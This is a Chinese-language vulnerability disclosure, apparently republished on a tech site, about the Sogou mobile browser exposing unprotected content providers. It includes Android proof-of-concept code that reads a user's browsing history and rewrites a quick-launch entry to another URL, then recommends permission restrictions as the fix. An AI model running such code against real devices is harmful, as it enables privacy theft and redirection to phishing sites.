知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

搜狗手机浏览器隐私泄露和主页篡改漏洞二合一(需要手机里有恶意

发布时间:2014-07-15 11:50:29作者:知识屋

搜狗手机浏览器存在,恶意攻击者利用本地的恶意app盗取用户的浏览记录隐私,修改主页为任意的钓鱼网站。
 
漏洞原因:
 
几个重要的content provider都没做任何权限限制。
 
攻击代码:
 
 
 
Uri contentUri2 = Uri.parse("content://sogou.mobile.explorer/quicklaunch");

        Cursor c = getContentResolver().query(contentUri1, null, null, null, null);

        String xc ="";

        if (c.moveToFirst()) {

for (int i = 0; i < c.getCount(); i++) {

c.moveToPosition(i);

String title = c.getString(1);

String url = c.getString(2);

xc=xc + title + ":" + url + "rn";

}

}



        ContentValues test = new ContentValues();   

        test.put("url", "http://www.qq.com");

        int xxx = getContentResolver().update(contentUri2,test,"_id=?",new String[]{"1"});

 

 
 
 
我没有打开草榴 - -!!!
 
点击SOHU,打开的是QQ.com,如果是钓鱼呢 - -!!
 
 
 

修复方案:
对content provider做权限限制
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜